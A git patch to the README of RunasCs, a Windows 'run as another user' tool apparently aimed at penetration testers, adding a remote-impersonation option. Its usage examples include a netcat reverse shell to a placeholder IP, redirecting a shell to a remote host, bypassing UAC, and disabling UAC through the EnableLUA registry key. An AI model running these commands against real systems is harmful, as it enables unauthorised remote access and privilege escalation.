From b0f57aa3d1f709203914578c9d0d1f7bebc7a11d Mon Sep 17 00:00:00 2001 From: antonioCoco Date: Sat, 20 May 2023 02:45:55 +0200 Subject: [PATCH] Update README.md --- README.md | 89 +++++++++++++++++++++++++++---------------------------- 1 file changed, 44 insertions(+), 45 deletions(-) diff --git a/README.md b/README.md index f00137e..5f71d30 100644 --- a/README.md +++ b/README.md @@ -11,6 +11,7 @@ This tool is an improved and open version of windows builtin *runas.exe* that so * Uses more reliable create process functions like ``CreateProcessAsUser()`` and ``CreateProcessWithTokenW()`` if the calling process holds the required privileges (automatic detection) * Allows to specify the logon type, e.g. 8-NetworkCleartext logon (no *UAC* limitations) * Allows to bypass UAC when an administrator password is known (flag --bypass-uac) +* Allows to create a process with the main thread impersonating the requested user (flag --remote-impersonation) * Allows redirecting *stdin*, *stdout* and *stderr* to a remote host * It's Open Source :) @@ -34,26 +35,26 @@ Based on the process caller token permissions, it will use one of the create pro ---- ```console -RunasCs v1.4 - @splinter_code +RunasCs v1.5 - @splinter_code Usage: - RunasCs.exe username password cmd [-d domain] [-f create_process_function] [-l logon_type] [-r host:port] [-t process_timeout] [--create-profile] [--bypass-uac] + RunasCs.exe username password cmd [-d domain] [-f create_process_function] [-l logon_type] [-r host:port] [-t process_timeout] [--force-profile] [--bypass-uac] [--remote-impersonation] Description: RunasCs is an utility to run specific processes under a different user account by specifying explicit credentials. In contrast to the default runas.exe command - it supports different logon types and crateProcess functions to be used, depending + it supports different logon types and CreateProcess* functions to be used, depending on your current permissions. Furthermore it allows input/output redirection (even to remote hosts) and you can specify the password directly on the command line. Positional arguments: username username of the user password password of the user - cmd command supported by cmd.exe if process_timeout>0 - commandline for the process if process_timeout=0 + cmd commandline for the process + Optional arguments: -d, --domain domain - domain of the user, if in a domain. + domain of the user, if in a domain. Default: "" -f, --function create_process_function CreateProcess function to use. When not specified @@ -63,67 +64,65 @@ Optional arguments: 1 - CreateProcessWithTokenW 2 - CreateProcessWithLogonW -l, --logon-type logon_type - the logon type for the spawned process. - Default: "8" - NetworkCleartext - -r, --remote host:port - redirect stdin, stdout and stderr to a remote host. - Using this option sets the process timeout to 0. + the logon type for the token of the new process. + Default: "2" - Interactive -t, --timeout process_timeout the waiting time (in ms) for the created process. This will halt RunasCs until the spawned process ends and sent the output back to the caller. - If you set 0 no output will be retrieved and cmd.exe - won't be used to spawn the process. + If you set 0 no output will be retrieved and a + background process will be created. Default: "120000" - -p, --create-profile - if this flag is specified RunasCs will force the - creation of the user profile on the machine. + -r, --remote host:port + redirect stdin, stdout and stderr to a remote host. + Using this option sets the process_timeout to 0. + -p, --force-profile + force the creation of the user profile on the machine. This will ensure the process will have the environment variables correctly set. - NOTE: this will leave some forensics traces - behind creating the user profile directory. - Compatible only with -f flags: - 1 - CreateProcessWithTokenW - 2 - CreateProcessWithLogonW - -b, --bypass-uac - if this flag is specified RunasCs will try a UAC - bypass to spawn a process without token limitation - (not filtered). + WARNING: If non-existent, it creates the user profile + directory in the C:\Users folder. + -b, --bypass-uac + try a UAC bypass to spawn a process without + token limitations (not filtered). + -i, --remote-impersonation + spawn a new process and assign the token of the + logged on user to the main thread. Examples: - Run a command as a specific local user - RunasCs.exe user1 password1 whoami - Run a command as a specific domain user and interactive logon type (2) - RunasCs.exe user1 password1 whoami -d domain -l 2 - Run a background/async process as a specific local user, - RunasCs.exe user1 password1 "%COMSPEC% powershell -enc..." -t 0 + Run a command as a local user + RunasCs.exe user1 password1 "cmd /c whoami /all" + Run a command as a domain user and logon type as NetworkCleartext (8) + RunasCs.exe user1 password1 "cmd /c whoami /all" -d domain -l 8 + Run a background process as a local user, + RunasCs.exe user1 password1 "C:\tmp\nc.exe 10.10.10.10 4444 -e cmd.exe" -t 0 Redirect stdin, stdout and stderr of the specified command to a remote host - RunasCs.exe user1 password1 cmd.exe -r 10.10.10.24:4444 - Run a command simulating the /netonly flag of runas.exe - RunasCs.exe user1 password1 whoami -d domain -l 9 + RunasCs.exe user1 password1 cmd.exe -r 10.10.10.10:4444 + Run a command simulating the /netonly flag of runas.exe + RunasCs.exe user1 password1 "cmd /c whoami /all" -l 9 Run a command as an Administrator bypassing UAC - RunasCs.exe adm1 password1 "whoami /priv" --bypass-uac + RunasCs.exe adm1 password1 "cmd /c whoami /priv" --bypass-uac + Run a command as an Administrator through remote impersonation + RunasCs.exe adm1 password1 "cmd /c echo admin > C:\Windows\admin" -l 8 --remote-impersonation ``` The two processes (calling and called) will communicate through one *pipe* (both for *stdout* and *stderr*). -The default logon type is 8 (*NetworkCleartext*). - -**NetworkCleartext** logon type is the one with widest permissions as it doesn't get filtered by UAC in local tokens and still allows - authentications over the Network as it stores credentials in the authentication package. +The default logon type is 2 (*Interactive*). -If you set *Interactive* (2) logon type you will face some *UAC* restriction problems. +By default, the *Interactive* (2) logon type is restricted by *UAC* and the generated token from these authentications are filtered. You can make interactive logon without any restrictions by setting the following regkey to 0 and restart the server: ``` HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ``` -Otherwise, you can try the flag **--bypass-uac** for an attempt in bypassing the token filtered limitation. +Otherwise, you can try the flag **--bypass-uac** for an attempt in bypassing the token filtering limitation. + +**NetworkCleartext (8)** logon type is the one with the widest permissions as it doesn't get filtered by UAC in local tokens and still allows + authentications over the Network as it stores credentials in the authentication package. If you holds enough privileges, try to always specify this logon type through the flag --logon-type 8. -By default, the calling process (*RunasCs*) will wait until the end of the execution of the spawned process and will use -``cmd.exe`` to manage *stdout* and *stderr*. If you need to spawn a background or async process, i.e. spawning a reverse shell, -you need to set the parameter ``-t timeout`` to ``0``. In this case the process will be spawned without using ``cmd.exe`` -and *RunasCs* won't wait for the end of the execution. +By default, the calling process (*RunasCs*) will wait until the end of the execution of the spawned process. +If you need to spawn a background or async process, i.e. spawning a reverse shell, you need to set the parameter ``-t timeout`` to ``0``. In this case *RunasCs* won't wait for the end of the newly spawned process execution. ### References